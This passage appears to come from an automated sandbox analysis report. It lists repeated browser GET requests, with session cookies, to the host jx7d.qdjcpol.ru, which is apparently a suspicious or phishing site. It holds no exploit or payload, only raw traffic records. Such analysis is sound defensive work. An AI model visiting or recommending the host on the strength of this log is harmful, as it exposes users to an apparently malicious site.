XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /GDSherpa-vf2.woff2 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveOrigin: https://jx7d.qdjcpol.rusec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /34RYny4Df6mtfDjmiKr0cnjcs1ij2pkVWqY1OIag67110 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxqs5ePQhOj8nmB61sX2wzYme6YLopFevC0J0i2XjoCB34123 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrlWpcPtfLA5pIOkLmnFRGskA9fK6RUI4C45137 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kltlxMUFc5Ka0cYZrVzSixKTKMTMsdITGWUoCYJQqrYmHorQqZhdPG6moFkzMoArn1I6wWQgRKkhyz230 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /wxqs5ePQhOj8nmB61sX2wzYme6YLopFevC0J0i2XjoCB34123 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /mnkvw24wtUHFHQPbBtOlDRiEJcph9EHF7kklVwQjN3RPhoUSW6kMlvv9YtGJxK64RlM5uv215 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /efK2FIvDz4exzwBMGuiQzijGRS9SC3l3iixUgqu1a78150 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /qrlWpcPtfLA5pIOkLmnFRGskA9fK6RUI4C45137 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImZWd1EvaitSTFl0bDFNRU01dzlXK0E9PSIsInZhbHVlIjoiZ3FtVmlGZkFxdVQvMEMrWWpJMG5jM01zbGlaMlpaS2lMendCeDJSeUNwMEFSUzhlUVNqSU9pZUw1SU8vd1VtMVNWSkZ4cGRsRlcyLzRJNXNPb0xHVmxnYzIrQ3l0aTR0ZlJsZnJaWnBmK0JqQ1E3cFowVWVnbEt2d293TUpPYnEiLCJtYWMiOiI0YzAwMjc4ZjM1Y2ZiYzhlNWI4NDllZTJmZDA2OWM4ODRhMjIwOGI5NWI4NTcwNWZlZWE2ZjBmN2FjNmUxYjNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9jR1krYVhVVVQvd1lxd3F3TWNWekE9PSIsInZhbHVlIjoiTmpaY1dnYmNWTlpIbjNkTWdkTmJTN1Y4aUhwWmwxTlI4ZDlMZmpEVzJRODBwRWtxbHF4TU4vanJtRjRyMktBMnFtWVhvRmJlNVFnOUJLUHVyUWZoZ24wbk1FNkd0bU93bHV2NkdRN3IxS01MbjFibElKcXhzelJ0dnhVMy8vdGMiLCJtYWMiOiI4NjY5ODhjNDFhMmFhNTE3MDE1YjA3OWUwNzE1NjRjY2I4OTk3YmQ3MDljZDU5MGU3ZjI1NjM5NjFmMzFjYTRkIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /rvc8hP5OiiRCTBRKrpSWcixJnab1LN0CtOzu45Y5NSG36o4V3zhPkzoC4r7vgz HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kltlxMUFc5Ka0cYZrVzSixKTKMTMsdITGWUoCYJQqrYmHorQqZhdPG6moFkzMoArn1I6wWQgRKkhyz230 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /ijxklk3o1uVrqMrRUBGmWAprfMcMwxTiET7gzJd6S83STchwGwZuL1156169 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /mnkvw24wtUHFHQPbBtOlDRiEJcph9EHF7kklVwQjN3RPhoUSW6kMlvv9YtGJxK64RlM5uv215 HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ikk4Z3BuMDd1OWlGeS9EWGpSRVZZTnc9PSIsInZhbHVlIjoiUlF6cjBULzB1cE9jSk1YZGl5RVlpcEtBMmlrcllERWZDaWRkKzJ1b3pScEFpSHE4Wk94akdYZ3FrYlltT01tWWhreHFHeGJ0bXJodlozKzU4YkswbDRLMnhCaGNZbXFZRmp4SDhpa3BUZTZUYUFDczZiUnhZZHJiRmkxRFNpMDciLCJtYWMiOiJiZmVlZWQ3ZGNhMmFiZDY3YWE1MjMwMDZjYWU3YWNhZDk2NTgzMDBlODVmYjIxNDMxMDFhNGQ1OTk5ZDA2YzZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik9yZUZQOXh5eDFUdWw4UmkzYlZHU0E9PSIsInZhbHVlIjoiazlWemhCOFRmMWdGMkFYMXpuSHFQdXVCODE3SGNvdkdQTGFTQmY5Wk5YZGNTSDBFakkvdVlkK3B1enp2MHVhUm9qQ1hwOHFqWmE1VUlWamxBVmhkclNld1VRallYNzdKOGl5ZVN1dE5zM1BqMDRIZjhLRWJsdG9RVHJMNWprZFIiLCJtYWMiOiIyOTRiOWJlYjBmODNkMWFiZTVhYmQ5ZGE5YWIzNWQyZGM5NGM0YTc4MmJjZjk3NWMyYzM4YjE5YjBiMjM4YWVlIiwidGFnIjoiIn0%3D
